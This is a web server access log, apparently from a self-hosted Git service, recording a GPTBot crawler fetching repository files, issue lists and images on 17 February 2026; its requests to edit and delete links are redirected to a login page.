"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11326] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 19805] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 19802] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 11099] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 11060] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:17:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 